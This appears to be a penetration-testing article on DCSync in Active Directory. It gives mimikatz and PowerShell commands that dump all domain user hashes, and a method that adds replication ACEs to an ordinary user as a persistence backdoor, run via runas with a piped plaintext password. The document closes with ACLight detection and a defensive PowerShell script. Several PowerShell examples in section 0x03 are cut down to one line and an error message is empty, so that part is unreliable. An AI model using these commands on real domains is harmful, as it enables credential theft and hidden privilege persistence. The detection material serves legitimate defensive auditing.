0x00 Preface
---
DCSync is a frequently used technique in domain penetration. This article compiles open-source materials, combines them with personal experience, and summarizes methods for exploitation, defense, and detection.
0x01 Introduction
---
This article will cover the following topics:
- Method to export all domain user hashes using DCSync
- Method to maintain persistence within the domain using DCSync
- Automated detection methods for DCSync backdoors
0x02 Method to export all domain user hashes using DCSync
---
DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY (gentilkiwi) and Vincent LE TOUX, capable of exporting the hashes of all users in the domain.
Prerequisites:
Obtain the privileges of any of the following:
- Users in the Administrators group
- Users in the Domain Admins group
- Users in the Enterprise Admins group
- Computer account of the domain controller
Exploitation principle:
Use the DRS (Directory Replication Service) protocol to request replication of user credentials from the domain controller via the IDL_DRSGetNCChanges call.
Reference materials:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47
Implementation code:
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L27
Exploitation method:
1. Use mimikatz
Export hashes of all users in the domain:
```cmd
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit
```
Export hash of the administrator account in the domain:
```cmd
mimikatz.exe "lsadump::dcsync /domain:test.com /user:administrator /csv" exit
```
2. PowerShell Implementation
https://gist.github.com/monoxgas/9d238accd969550136db
This script calls the DCSync function of mimikatz.dll through Invoke-ReflectivePEInjection.
Export hashes of all users in the domain:
```powershell
Invoke-DCSync -DumpForest | ft -wrap -autosize
```
Export the hash of the administrator account in the domain:
```powershell
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
```
Note:
After obtaining the hashes of domain users, further exploitation can refer to previous articles:
"Domain Penetration - Implementation of Pass The Hash"
"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)"
"Domain Penetration - Pass The Hash & Pass The Key"
0x03 Methods for Maintaining Domain Privileges Using DCSync
---
Exploitation Conditions:
Obtain the privileges of any of the following:
- Users within the Domain Admins group
- Users within the Enterprise Admins group
Exploitation Principle:
Add the following three ACEs (Access Control Entries) for a regular domain user to the domain object:
- DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
- DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
- DS-Replication-Get-Changes-In-Filtered-Set (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)
This user then gains the permission to export all user hashes in the domain using DCSync.
Implementation Code:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270
Exploitation Method:
The command to add ACEs is as follows:
```powershell
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
```
Supplement:
Command to remove the ACEs:
```powershell
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
```
Note:
For more information on ACLs, refer to the previous article: "Penetration Techniques - Access Control List in Windows"
The method to invoke DCSync using domain user test1 is as follows:
1. On a domain-joined host logged in as user test1, use the DCSync feature of mimikatz directly:
```cmd
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit
```
2. Use runas to log in as user test1, then perform DCSync
(1) Pop up a cmd window
```cmd
echo 123456789 | runas /noprofile /user:test\test1 cmd
```
Execute the following command in the popped-up cmd window:
```cmd
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit
```
(2) Execute without popping up a window
```cmd
echo 123456789 | runas /noprofile /user:test\test1 c:\test\1.bat
```
The content of 1.bat is as follows:
```bat
c:\test\mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit>c:\test\1.txt
```
Note:
Similar tools include lsrunas, lsrunase, and CPAU.
3. Using PowerShell to log in as user test1, then performing DCSync
(1) Launch cmd
```powershell
$uname="test\test1"
```
Execute the following command in the launched cmd:
```cmd
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit
```
(2) Implement without pop-up window
```powershell
$uname="test\test1"
```
The content of 1.bat is as follows:
```bat
c:\test\mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit>c:\test\1.txt
```
Note:
Using wmic to log in as user test1 on the local machine fails with the following error:
```
ERROR:
```
0x04 Automated Detection Method for DCSync Backdoors
---
Users who hold high privileges without being members of high-privilege groups are called Shadow Admins; the domain user test1 from 0x03 is one example. Simply querying the membership of high-privilege groups cannot reveal Shadow Admins in the domain.
Detection Principle:
Enumerate the ACLs of all objects in Active Directory and flag the accounts that effectively hold privileged rights.
Implementation Code:
https://github.com/cyberark/ACLight
Conditions:
- PowerShell v3.0
- Domain user privileges
Detection Method:
Execute Execute-ACLight2.bat from the project.
Three files are generated:
- Privileged Accounts - Layers Analysis.txt
- Privileged Accounts Permissions - Final Report.csv
- Privileged Accounts Permissions - Irregular Accounts.csv
These files list all privileged accounts.
Testing shows that ACLight detects user test1 after the DCSync permissions have been added.
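As an added, defender-side example that is not part of the original article or the ACLight project, the following PowerShell script reads the DACL of the domain naming context directly and reports every principal holding the DCSync right pair from 0x03 (DS-Replication-Get-Changes plus DS-Replication-Get-Changes-All, whether granted by name, by an "all extended rights" ACE, or by GenericAll) that is not a default holder. The allow-list pattern for expected holders is an assumption and should be adjusted to the environment.

```powershell
# Added example (not from the original article or ACLight). Assumes a domain-joined host;
# any domain user can read the security descriptor of the domain object by default.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllGuid = '00000000-0000-0000-0000-000000000000'
# Principals that legitimately hold replication rights; adjust to your environment (assumption)
$ExpectedPattern = '^(NT AUTHORITY\\(SYSTEM|ENTERPRISE DOMAIN CONTROLLERS)|BUILTIN\\Administrators|.+\\(Domain Controllers|Enterprise Admins|Domain Admins|Enterprise Read-only Domain Controllers))$'

function Get-DCSyncPrincipal {
    param([string]$DomainDN = ([ADSI]'LDAP://RootDSE').defaultNamingContext)
    $domain = [ADSI]"LDAP://$DomainDN"
    # Explicit and inherited ACEs, trustees returned as SIDs so unresolvable SIDs do not abort the query
    $rules = $domain.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    $byPrincipal = @{}
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString().ToLower()
        $granted = @()
        if ($ReplRights.ContainsKey($guid)) { $granted += $ReplRights[$guid] }
        # An ExtendedRight ACE with an empty ObjectType covers every extended right; GenericAll includes that bit
        elseif ($guid -eq $AllGuid -and
                [int]($ace.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0) {
            $granted += @($ReplRights.Values)
        }
        if (-not $granted) { continue }
        $sid = $ace.IdentityReference
        try { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $who = $sid.Value }
        if (-not $byPrincipal.ContainsKey($who)) { $byPrincipal[$who] = @() }
        $byPrincipal[$who] += $granted
    }
    foreach ($who in $byPrincipal.Keys) {
        $r = $byPrincipal[$who] | Sort-Object -Unique
        [PSCustomObject]@{
            Principal = $who
            Rights    = $r -join ', '
            # Both rights are needed to replicate secrets, which is what DCSync relies on
            CanDCSync = ($r -contains 'DS-Replication-Get-Changes') -and ($r -contains 'DS-Replication-Get-Changes-All')
            Expected  = $who -match $ExpectedPattern
        }
    }
}

# A shadow admin such as test1 from 0x03 shows up here with CanDCSync = True and Expected = False
Get-DCSyncPrincipal | Where-Object { $_.CanDCSync -and -not $_.Expected } | Format-Table -AutoSize
```

Drop the Where-Object filter to review the full list, including the default holders, when baselining a domain.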
0x05 Summary
---
This article introduced the exploitation of DCSync in domain penetration and an automated detection method. From a defensive perspective, it is recommended to use ACLight to audit user ACLs in the domain environment.